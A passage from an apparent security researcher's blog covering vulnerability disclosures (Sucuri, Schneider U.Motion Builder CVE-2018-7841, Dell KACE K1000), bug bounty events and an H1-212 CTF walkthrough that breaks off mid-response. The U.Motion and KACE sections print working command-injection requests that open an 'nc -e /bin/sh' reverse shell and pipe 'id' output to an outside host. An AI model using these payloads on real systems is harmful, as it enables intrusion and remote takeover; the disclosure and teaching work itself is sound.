  3. You could also encrypt the payload to be sent to the customer site using public-private key crypto on your side and decrypt it using the public key on the client side (rather than encoding it using base64). Should also be doable in pure PHP.
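To make the first suggestion a bit more concrete: one simple variant is to ship a dedicated CA bundle with the scanner and point curl at it, instead of relying on the host's CA store. A minimal sketch (the bundle file name is illustrative, and this is only one possible approach, not Sucuri's implementation):

<?php
// Keep verification enabled and pin it against a CA bundle shipped alongside
// the scanner, so missing system CA libraries are no longer an excuse.
$c = curl_init('https://monitor2.sucuri.net/imonitor');
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($c, CURLOPT_CAINFO, __DIR__ . '/sucuri-ca-bundle.pem'); // bundled CA file
$result = curl_exec($c);

if ($result === false) {
    // Certificate (or chain) failed to validate - never eval() anything here.
    exit(1);
}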

2017-11-29 to 2018-05-16

Sucuri went silent for half a year, where I’ve tried to contact them through HackerOne and directly via email. During that period I’ve also requested mediation through HackerOne.

2018-06-07

Suddenly out of the blue Sucuri told me that they have a fix ready for testing.

2018-06-21

Sucuri rewards the minimum bounty of 250 USD because of:

  1. A successful exploitation only works if a malicious actor uses network-level attacks (resulting in MITM) against the hosting server (or any of the intermediary hops to it) to impersonate our API. While in theory possible, this would require a lot of efforts for very little results (in term of the amount of sites affected at once versus the capacity required to conduct the attack). The fact we use anycast also doesn’t guarantee a BGP hijacking attack would be successful.
  2. The server-side scanner file contains a unique hash for every single site, which is an information the attacker would also need in order to perform any kind of attack against our customers.

2018-07-18

Sucuri adds an additional 500 USD to the bounty amount because they apparently misunderstood the signature validation point.

2018-09-15

I’ve requested to publicly disclose this issue because it was of so low severity for Sucuri, they shouldn’t have a problem with publicly disclosing this issue.

2018-10-12

A couple of days before the scheduled disclosure date, Sucuri reopened the report and changed its status to Informative without any further clarification. No further reply on any channel from Sucuri - that's where they went silent for the second time.

2018-11-23

I’ve followed up with HackerOne about the whole story and they literally tried everything to resolve this issue by contacting Sucuri directly. HackerOne told me that Sucuri will close their program and the reason for the status change was to address some information which they feel is sensitive.

HackerOne closes the program at their request on 2018-12-15. HackerOne even made them aware of different tools to censor the report, but Sucuri did not react anymore (again).

2019-01-02

Agreed with HackerOne about taking the last resort disclosure option, and giving Sucuri another 180 days of additional time to respond. They never responded.

2019-06-13 to 2019-06-19

I’ve sent a couple of more emails directly to Sucuri (where they used to respond to) to make them aware of this blog post, but again: no answer at all.

2019-06-20

Public disclosure in the interest of the general public according to HackerOne’s last resort option.

About HackerOne’s Last Resort Option

I have tried to disclose this issue several times through HackerOne, but unfortunately Sucuri wasn’t willing to provide any disclosure timeline (have you read the mentioned blog article?) - in fact they did not even respond anymore in the end (not even via email) - which is why I took the last resort option after consulting with HackerOne and as per their guidelines:

If 180 days have elapsed with the Security Team being unable or unwilling to provide a vulnerability disclosure timeline, the contents of the Report may be publicly disclosed by the Finder. We believe transparency is in the public’s best interest in these extreme cases.

Since this is about an RCE affecting potentially all of Sucuri’s customers who are using the server-side security scanner, and since there was no public or customer statement by Sucuri (at least that I am aware of) I think the general public deserves to know about this flaw.

CVE-2018-7841: Schneider Electric U.Motion Builder Remote Code Execution 0-day

13 May 2019 at 00:00

I came across an unauthenticated Remote Code Execution vulnerability (called CVE-2018-7841) on an IoT device which was apparently using a component provided by Schneider Electric called U.Motion Builder.

While I’ve found it using my usual BurpSuite foo, I later noticed that there is already a public advisory about a very similar looking issue published by ZDI named Schneider Electric U.Motion Builder track_import_export SQL Injection Remote Code Execution Vulnerability (ZDI-17-378) aka CVE-2018-7765).

However, the ZDI advisory does only list a brief summary of the issue:

The specific flaw exists within processing of track_import_export.php, which is exposed on the web service with no authentication. The underlying SQLite database query is subject to SQL injection on the object_id input parameter when the export operation is chosen on the applet call. A remote attacker can leverage this vulnerability to execute arbitrary commands against the database.

So I had a closer look at the source code and stumbled upon a bypass to CVE-2018-7765 which was previously (incompletely) fixed by Schneider Electric in version 1.3.4 of U.Motion Builder.

As of today the issue is still unfixed and it won’t be fixed at all in the future, since the product has been retired on 12 March 2019 as a result of my report!

The (Incomplete) Fix

U.Motion 1.3.4 contains the vulnerable file /smartdomuspad/modules/reporting/track_import_export.php, in which the application builds a SQLite WHERE clause ($where) by concatenating the object_id parameter, which can be supplied either via GET or POST:

switch ($op) {
    case "export":
[...]
        $where = "";
[...]
        if (strcmp($period, ""))
            $where .= "PERIOD ='" . dpadfunctions::string_encode_for_SQLite(strtoupper($period)) . "' AND ";
        if (!empty($date_from))
            $where .= "TIMESTAMP >= '" . strtotime($date_from . " 0:00:00") . "' AND ";
        if (!empty($date_to))
            $where .= "TIMESTAMP <= '" . strtotime($date_to . " 23:59:59") . "' AND ";
        if (!empty($object_id))
            $where .= "OBJECT_ID='" . dpadfunctions::string_encode_for_SQLite($object_id) . "' AND ";
        $where .= "1 ";
[...]

You can see that object_id is first run through the string_encode_for_SQLite method, which does nothing more than strip out a few otherwise unreadable characters (see dpadfunctions.class.php):

function string_encode_for_SQLite( $string ) {
        $string = str_replace( chr(1), "", $string );
        $string = str_replace( chr(2), "", $string );
        $string = str_replace( chr(3), "", $string );
        $string = str_replace( chr(4), "", $string );
        $string = str_replace( chr(5), "", $string );
        $string = str_replace( chr(6), "", $string );
        $string = str_replace( chr(7), "", $string );
        $string = str_replace( chr(8), "", $string );
        $string = str_replace( chr(9), "", $string );
        $string = str_replace( chr(10), "[CRLF]", $string );
        $string = str_replace( chr(11), "", $string );
        $string = str_replace( chr(12), "", $string );
        $string = str_replace( chr(13), "", $string );
        $num = str_replace( ",",".", $string );
        if ( is_numeric( $num ) ) {
            $string = $num;
        }
        else {
            $string = str_replace( "'", "''", $string );
            $string = str_replace( ",","[COMMA]", $string );
        }
        return $string;
}

The resulting $where is afterwards embedded into $query, which is passed to $dbClient->query():

[...]
$query = "SELECT COUNT(ID) AS COUNTER FROM DPADD_TRACK_DATA WHERE $where";
$counter_retrieve_result = $dbClient->query($query,$counter_retrieve_result_id,_DPAD_DB_SOCKETPORT_DOMUSPADTRACK);
[...]

The query() method can be found in dpaddbclient_NoDbManager_sqlite.class.php:

function query( $query, &$result_set_id, $sDB = null ) {
        $this->setDB( $sDB );
        define( "_DPAD_LOCAL_BACKSLASHED_QUOTE", "[QUOTEwithBACKSLASH]" );
        $query = str_replace("\\\"", _DPAD_LOCAL_BACKSLASHED_QUOTE, $query);
        $query = str_replace("\"", "\\\"", $query);
        $query = str_replace("$", "\$", $query);
        $query = str_replace( _DPAD_LOCAL_BACKSLASHED_QUOTE, "\\\\\"", $query);
        $query_array = explode(" ", trim($query) );
        switch ( strtolower( $query_array[0] ) ) {
        case "insert":
            $query = $query . ";" . "SELECT last_insert_rowid();";
            break;
        case "select":
        default:
            break;
        } $result_set_id = null;
        $sqlite_cmd = _DPAD_ABSOLUTE_PATH_SQLITE_EXECUTABLE . " -header -separator '~' " . $this->getDBPath() . " \"" . $query . "\"";
        $result = exec( $sqlite_cmd, $output, $return_var );
[...]

Here you can see that the query string (which contains object_id) is fed through a bunch of str_replace calls intended to filter out dangerous characters such as $, which is used for Unix command substitution. At the end of the snippet, another string, $sqlite_cmd, is concatenated with the previously built $query string and finally passed to a PHP exec() call.

The Exploit

So apparently Schneider Electric tried to fix the previously reported vulnerability by the following line:

$query = str_replace("$", "\$", $query);
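To see why this single substitution falls short, here is a quick, self-contained repro (a simplified stand-in for the real code path, not the vendor source): backticks inside the double-quoted shell argument are still expanded by the shell.

<?php
// Simplified repro: the "$" substitution is applied, but a backtick payload in
// object_id survives and gets command-substituted once exec() hands the
// double-quoted string to /bin/sh.
$object_id = "`id`";
$query = "SELECT * FROM DPADD_TRACK_DATA WHERE OBJECT_ID='" . $object_id . "' AND 1";
$query = str_replace("$", "\$", $query);   // the incomplete 1.3.4 fix
exec("echo \"" . $query . "\"", $output);  // echo stands in for the sqlite3 call
print_r($output);                          // the output contains the result of `id`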

So just filtering out $ is not enough to prevent a command injection into an exec() call. In order to bypass the str_replace fix on an actual installation, you can simply use the backtick operator, as in the following example request:

POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

op=export&language=english&interval=1&object_id=`nc -e /bin/sh www.rcesecurity.com 53`

resulting in a nice reverse shell:

A Few Words about the Disclosure Process

I contacted Schneider Electric for the first time on 15 November 2018. At that point, their vulnerability reporting form wasn't working at all and kept throwing errors, so I tried to contact them via Twitter (both through a public tweet and via DM) and mentioned at the same time that their reporting form did not work. Although I never received a response, the form was fixed at some point without letting me know. I then sent over all the details of the vulnerability and informed them about my 45-day disclosure policy starting from mid-November. From that day on, the communication with their CERT went quite smoothly, and I agreed to extend the disclosure date to 120 days to give them more time to fix the issue. In the end, the entire product was retired on 12 March 2019, which is the reason why I delayed this disclosure by two more months.

Dell KACE K1000 Remote Code Execution - the Story of Bug K1-18652

9 April 2019 at 00:00

This is the story of an unauthenticated RCE affecting one of Dropbox’s in scope vendors during last year’s H1-3120 event. It’s one of my more recon-intensive, yet simple, vulnerabilities, and it (probably) helped me to become MVH by the end of the day ;-).

TL;DR It’s all about an undisclosed but fixed bug in the KACE Systems Management Appliance internally tracked by the ID K1-18652 which allows an unauthenticated attacker to execute arbitrary code on the appliance. Since the main purpose of the appliance is to manage client endpoints - and you are able to deploy software packages to clients - I theoretically achieved RCE on all of the vendor’s clients. It turns out that Dell (the software is now maintained by Quest) have silently fixed this vulnerability with the release of version 6.4 SP3 (6.4.120822).

Recon is Key!

While doing recon for the in-scope assets during H1-3120, I came across an administrative panel of what looked like being a Dell Kace K1000 Administrator Interface:

While gathering some background information about this “Dell Kace K1000” system, I came across the very same software now being distributed by a company called “Quest Software Inc”, which was previously owned by Dell.

Interestingly, Quest also offers a free trial of the KACE® Systems Management Appliance. Unfortunately, the free trial only covers the latest version of the appliance (v9.0.270 at the time of this post), which also looks completely different:

However, the version I’ve found on the target was 6.3.113397 according to the very chatty web application:

X-DellKACE-Appliance: k1000
X-DellKACE-Host: redacted.com
X-DellKACE-Version: 6.3.113397
X-KBOX-WebServer: redacted.com
X-KBOX-Version: 6.3.113397

So there are at least three major versions between what I found and the current release. Even trying to social-engineer Quest support into providing me with an older version did not work - apparently, I'm not a good social engineer ;-)

Recon is Key!!

At first I thought that both versions wouldn't be comparable at all, because codebases usually change heavily between major versions, but I still decided to give it a try. I set up a local testing environment with the latest version to poke around with it and understand what it is about. To be honest, at that point I had very low expectations of finding anything in the new version that could be applied to the old one. Apparently, I was wrong.

Recon is Key !!!11

While having a look at the source code of the appliance, I stumbled upon a naughty little file called /service/krashrpt.php, which is reachable without any authentication and whose sole purpose is to handle crash dump files.

When reviewing the source code, I’ve found a quite interesting reference to a bug called K1-18652, which apparently was filed to prevent a path traversal issue through the parameters kuid and name ( $values is basically a reference to all parameters supplied either via GET or POST):

try {
    // K1-18652 make sure we escape names so we don't get extra path characters to do path traversal
    $kuid = basename($values['kuid']);
    $name = basename($values['name']);
} catch( Exception $e ) {
    KBLog( "Missing URL param: " . $e->getMessage() );
    exit();
}

Later kuid and name are used to construct a zip file name:

$tmpFnBase = "krash_{$name}_{$kuid}";
$tmpDir = tempnam( KB_UPLOAD_DIR, $tmpFnBase );
unlink( $tmpDir );
$zipFn = $tmpDir . ".zip";

However, K1-18652 does not only introduce the basename call to prevent the path traversal, but also two escapeshellarg calls to prevent any arbitrary command injection through the $tmpDir and $zipFn strings:

// unzip the archive to a tmpDir, and delete the .zip file
// K1-18652 Escape the shell arguments to avoid remote execution from inputs
exec( "/usr/local/bin/unzip -d " . escapeshellarg($tmpDir) . " " . escapeshellarg($zipFn));
unlink( $zipFn );

Although escapeshellarg does not fully prevent command injections, I haven't found any working way to exploit it on the most recent version of the K1000.
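Presumably, before K1-18652 the same call simply concatenated the raw parameters into the command line. A reconstructed sketch of that assumption (for illustration only - this is not the actual KACE source) shows why a backtick payload in kuid would then reach the shell:

<?php
// Reconstructed sketch of the assumed pre-fix behaviour: no escapeshellarg(),
// so the shell performs command substitution on backticks in the parameters.
$kuid = isset($_POST['kuid']) ? $_POST['kuid'] : '';   // e.g. `id | nc www.rcesecurity.com 53`
$name = isset($_POST['name']) ? $_POST['name'] : 'crash';

$tmpDir = "/tmp/krash_{$name}_{$kuid}";
$zipFn  = $tmpDir . ".zip";

exec("/usr/local/bin/unzip -d " . $tmpDir . " " . $zipFn);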

Using a new K1000 to exploit an old K1000

So K1-18652 addresses two potentially severe issues which have been fixed in the recent version. Out of pure curiosity, I decided to blindly try a common RCE payload against the old K1000 version, assuming that the escapeshellarg calls hadn't been implemented for the kuid and name parameters in the older version at all:

POST /service/krashrpt.php HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

kuid=`id | nc www.rcesecurity.com 53`

And guess what happened:

Awesome! This could afterwards be used to execute arbitrary code on all connected client systems because K1000 is an asset management system:

The KACE Systems Management Appliance (SMA) helps you accomplish these goals by automating complex administrative tasks and modernizing your unified endpoint management approach. This makes it possible for you to inventory all hardware and software, patch mission-critical applications and OS, reduce the risk of breach, and assure software license compliance. So you’re able to reduce systems management complexity and safeguard your vulnerable endpoints.

Source: Quest

Comment from the Vendor

Unfortunately, since I haven’t found any public references to the bug, the fix or an existing exploit, I’ve contacted Quest to get more details about the vulnerability and their security coordination process. Quest later told me that the fix was shipped by Dell with version 6.4 SP3 (6.4.120822), but that neither a public advisory has been published nor an explicit customer statement was made - so in other words: it was silently fixed.

#BugBountyTip

If you find some random software in use, consider investing the time to set up an instance of it locally, understand how it works, and search for bugs. This works for me every single time.

Thanks, Dropbox for the nice bounty!

H1-3120: MVH! (H1 Event Guide for Newbies)

29 June 2018 at 00:00

Here’s another late post about my coolest bug bounty achievement so far! In May I’ve participated in HackerOne’s H1-3120 in the beautiful city of Amsterdam with the goal to break some Dropbox stuff. It was a really tough target, but I still managed to find some juicy bugs! According to d0nutptr of the Dropbox team, these caused some internal troubles leading to some serious phone calls ;-). In the end I was awarded three out of the four titles of the evening: “The Exalted”, “The Assassin” and finally also the ”Most Valuable Hacker” (MVH)!

However, I do not only want to talk about my achievements (there are a lot of pictures available here), but rather give some tips to all upcoming event first-timers ;-).

You (usually) get to know the targets right before the event!

Typically, HackerOne provides you with a near-final scope a few days before the event. This means you will have some time to explore the target and already collect bugs before the actual event kicks off. My advice here is: hack as much as you can because of one awesome thing: Bounties will be split during the first 30 minutes! This means if 5 people submit the same vulnerability during the first 30 minutes, the bounty for the vulnerability will be equally split amongst everyone, i.e.: 1000 USD/5 people = 200 USD for everyone.

Do your recon prior to the event!

I usually do a lot of recon before I actually start hacking. While this already leads to bugs for myself, it creates another big advantage: I always find low-hanging or seemingly unexploitable things and while working with other hackers during the event, somebody might ask you if there is any endpoint vulnerable to an open redirect or whatever, because he/she actually needs it to complete an exploit chain. Why not collect some additional love here and provide them with your seemingly unexploitable stuff? They might help you out afterwards too!

Late-double-check your findings the night before the actual event!

Bad luck might hit you! It is possible that you find stuff, which the program fixes right before the event kicks off. Trust me, while working on bugs for H1-415, I found some really awesome bugs during the preparation phase for the event. However, while I was (more or less accidentally) checking one of my bugs the night before the event, I noticed that it has been fixed. From this point, I told myself to always late-double-check my bugs to avoid getting N/As.

Try to prevent Frans Rosen from submitting / submit your bugs using bountyplz!

While it is always a good idea to prevent Frans from using his machine to submit his findings, you should also use his tool “bountyplz” to mass-submit findings, especially if you have so many vulnerabilities on your waiting list that it could be difficult to submit them all during the 30-minute bounty-split window. Since the H1 reporting form isn't really made for quick submissions, it will help you get your reports in before the deadline ends.

Collaborate during the event!

Yes, it is still a competition, but don't underestimate collaboration! You will learn that everybody has their own specialties that can help with exploiting bugs! This is how I learned about Corb3nik's really awesome JavaScript skills!

Thank you very much HackerOne and Dropbox for organizing such an awesome event! I’m already looking forward to all the future events :-)

H1-415: Hacking My Way Into the Top 4 of the Day

3 May 2018 at 00:00

I’ve always wanted to visit San Francisco! So I was really happy about an email from HackerOne inviting me to this beautiful city in April. But they did not cover all the costs for my international flights and the hotel room just for my personal city trip - they had something really nasty in mind: hacking Oath! If you don’t know Oath - they own brands like Yahoo, AOL, Tumblr, Techcrunch amongst others.

So while a free trip to San Francisco by itself is already an awesome thing, HackerOne did a great job in organizing a live hacking event which currently has no equal…and this does not only apply to the logo ;-)

The event itself took place in a beautiful coworking space in downtown San Francisco on the 14th floor with a nice view over San Francisco, including a tasty breakfast. This breakfast was indeed needed for the upcoming 9 hours of hacking kung-fu! The hacking was finally kicked off at 10:00 with a pretty nice scope to hack on. However, the scope itself has already been announced a couple of days prior to the event itself, so that everyone had the chance to prepare some nice vulnerabilities and bring them to the event. The only tricky thing was to verify the vulnerabilities again before submitting them during the event to make sure they haven’t been fixed by a last-minute patch ;-)

As part of this preparation I found almost 20 vulnerabilities ranging from Cross-Site Scripting up to some nice SQL Injection chains. The first 60 minutes of the event were covered by a blackout period where everybody had the chance to submit their findings without having to fear duplicates! The good thing about this approach was that duplicates have been paid out by splitting the bounty amount amongst all hackers that reported the same vulnerability. Luckily my personal dupe count was just at 3 resulting in my smallest bounty of USD 50. After this blackout period all duplicates were handled as usual - first come, first serve.

After 9 hours of continuous hacking my personal day ended with 25 vulnerability submissions, a maximum single payout of 5.000 USD and an overall rank of 4 on the event leaderboard:

At the end of the day, Oath had paid out a total of 400.000 USD (yes, that's 6 digits!) to all participating hackers, making this the biggest event so far!

However, there was more to this event than just getting bounties. During the event I met so many talented hackers like @yaworsk, @arneswinnen, @securinti, @smiegles, @SebMorin1, @thedawgyg, @seanmeals, @Corb3nik, @Rhynorater, @prebenve, @ngalongc, the famous @filedescriptor and many, many more, which is by far more valuable than any bounty! Thank you so much for being part of this community!

I would like to thank HackerOne, and specifically Ted Kramer, for organizing a really awesome event, and Ben Sadeghipour for giving me the chance to show my skills! A special thanks goes to the whole HackerOne triage team for triaging hundreds of vulnerability reports and paying them out right on stage - just another day at work, right ;-)?

It was a truly amazing experience - see you on the next event!

H1-212 CTF: Breaking the Teapot!

22 November 2017 at 00:00

With the h1-212 CTF, HackerOne offered a really cool chance to win a visit to New York City to hack on some exclusive targets in a top-secret location. To be honest, I'm not a CTF guy at all, but this incentive caught my attention. The only thing one had to do in order to participate was solve the CTF challenge, document the hacky way in, and hope to get selected in the end. So I decided to participate and try to get onto the plane - unfortunately, my write-up wasn't selected in the end, but I'd still like to share it for learning purposes :-)

Thanks to Jobert and the HackerOne team for creating a fun challenge!

Introduction

The CTF was introduced by just a few lines of story:

An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!

While this sounds like a very self-confident engineer, there is one big hint in these few lines to actually get a first step into the door: acme.org.

The first visit to the given URL at http://104.236.20.43/, showed nothing more than the “default Apache” page:

Identify All the Hints!

While brute-forcing a default Apache2 installation doesn’t make much sense (except if you want to rediscover /icons ;-) ), it was immediately clear that a different approach is required to solve this challenge.

What has proven to be quite fruitful in my bug bounty career is changing the Host header in order to reach other virtual hosts configured on the same web server. In this case, it took me only a single try to find out that the “new admin panel” of “acme.org” is actually located at “admin.acme.org” - so I changed the Host header from “104.236.20.43” to “admin.acme.org”:

GET / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

The Apache default page was suddenly gone and the web server returned a different response:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 06:16:41 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: admin=no
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

As you might have noticed already, there is one line in this response that looks highly suspicious: the web application issued a “Set-Cookie” directive setting the value of the “admin” cookie to “no”.

Building a Bridge Into the Teapot

While it’s always good to have a healthy portion of self-confidence, the engineer of acme.org seemed to have a bit too much of it when it comes to “the server can’t be hacked”.

Since cookies are actually user-controllable, imagine what would happen if the “admin” cookie value is changed to “yes”?

GET / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

Surprise, the web application responded differently with an HTTP 405 like the following:

HTTP/1.1 405 Method Not Allowed
Date: Wed, 15 Nov 2017 06:30:21 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

This means that the HTTP verb needed to be changed. However, when switching to an HTTP POST:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

The web application again responded differently with an HTTP 406 this time:

HTTP/1.1 406 Not Acceptable
Date: Wed, 15 Nov 2017 06:35:31 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

While googling around for this unusual status code, I came across the following description by W3:

10.4.7 406 Not Acceptable

The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.

Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.

Jumping into the Teapot

While the spec talks about the Accept header, in this case it seemed to be about a missing Content-Type declaration. After a “Content-Type” header of “application/json” was added to the request:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json

A third HTTP response code - HTTP 418 aka “the teapot” - was returned:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 06:40:18 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 37
Connection: close
Content-Type: application/json

{"error":{"body":"unable to decode"}}

Now it was pretty obvious that it’s about a JSON-based endpoint. By supplying an empty JSON body as part of the HTTP POST request:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 2

{}

The application responded with the missing parameter name:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 06:43:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 31
Connection: close
Content-Type: application/json

{"error":{"domain":"required"}}

Given the parameter name, this somehow smelled a bit like a nifty Server-Side Request Forgery challenge.

Short Excursion to SSRF

What I usually do as preparation for such scenarios is having a separate domain like “rcesec.com”, whose authoritative NS servers point to an IP/server under my control in order to be able to spoof DNS requests of all kinds. So e.g. “ns1.rcesec.com” and “ns2.rcesec.com” are the authoritative NS servers for “rcesec.com”, which both point to the IP address of one of my servers:

On the nameserver side, I like to use the really awesome tool called “dnschef” by iphelix, which is capable of spoofing all kinds of DNS records like A, AAAA, MX, CNAME or NS to whatever value you like. I usually point all A records to the loopback address 127.0.0.1 to discover some interesting data:
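
As a quick sanity check (a minimal sketch of mine, assuming the NS delegation described above is already in place), resolving any throw-away label under the domain should now return the spoofed loopback address:

import socket

# any random subdomain of rcesec.com should now resolve to the spoofed
# address served by dnschef (127.0.0.1 in this setup)
print(socket.gethostbyname("h1-212.rcesec.com"))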

Breaking the Teapot

Going on with the exploitation and adding a random sub-domain under my domain “rcesec.com”:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 30

{"domain":"h1-212.rcesec.com"}

resulted in the following response:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:09:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=0"}

Funny side note here: I accidentally bypassed another input filter which required the subdomain part of the “domain” parameter to include the string “212”, but I only noticed this at the end of the challenge :-D

So it seems that the application accepted the value and just responded with a reference to a new PHP file (Remember: PHP seems to be Jobert Abma’s favorite programming language ;-) ). When the proposed request was issued against the read.php file:

GET /read.php?id=0 HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

The application responded with a huge base64-encoded string:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:11:31 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 15109
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"CjwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPgogIDwhLS0KICAgIE1vZGlmaWVkIGZyb20gdGhlIERlYmlhbiBvcmlnaW5hbCBmb3IgVWJ1bnR1CiAgICBMYXN0IHVwZGF0ZWQ6IDIwMTQtMDMtMTkKICAgIFNlZTogaHR0cHM6Ly9sYXVuY2hwYWQubmV0L2J1Z3MvMTI4ODY5MAogIC0tPgogIDxoZWFkPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiIC8+CiAgICA8dGl0bGU+QXBhY2hlMiBVYnVudHUgRGVmYXVsdCBQYWdlOiBJdCB3b3JrczwvdGl0bGU+CiAgICA8c3R5bGUgdHlwZT0idGV4dC9jc3MiIG1lZGlhPSJzY3JlZW4iPgogICogewogICAgbWFyZ2luOiAwcHggMHB4IDBweCAwcHg7CiAgICBwYWRkaW5nOiAwcHggMHB4IDBweCAwcHg7CiAgfQoKICBib2R5LCBodG1sIHsKICAgIHBhZGRpbmc6IDNweCAzcHggM3B4IDNweDsKCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjRDhEQkUyOwoKICAgIGZvbnQtZmFtaWx5OiBWZXJkYW5hLCBzYW5zLXNlcmlmOwogICAgZm9udC1zaXplOiAxMXB0OwogICAgdGV4dC1hbGlnbjogY2VudGVyOwogIH0KCiAgZGl2Lm1haW5fcGFnZSB7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBkaXNwbGF5OiB0YWJsZTsKCiAgICB3aWR0aDogODAwcHg7CgogICAgbWFyZ2luLWJvdHRvbTogM3B4OwogICAgbWFyZ2luLWxlZnQ6IGF1dG87CiAgICBtYXJnaW4tcmlnaHQ6IGF1dG87CiAgICBwYWRkaW5nOiAwcHggMHB4IDBweCAwcHg7CgogICAgYm9yZGVyLXdpZHRoOiAycHg7CiAgICBib3JkZXItY29sb3I6ICMyMTI3Mzg7CiAgICBib3JkZXItc3R5bGU6IHNvbGlkOwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGRkZGRkY7CgogICAgdGV4dC1hbGlnbjogY2VudGVyOwogIH0KCiAgZGl2LnBhZ2VfaGVhZGVyIHsKICAgIGhlaWdodDogOTlweDsKICAgIHdpZHRoOiAxMDAlOwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGNUY2Rjc7CiAgfQoKICBkaXYucGFnZV9oZWFkZXIgc3BhbiB7CiAgICBtYXJnaW46IDE1cHggMHB4IDBweCA1MHB4OwoKICAgIGZvbnQtc2l6ZTogMTgwJTsK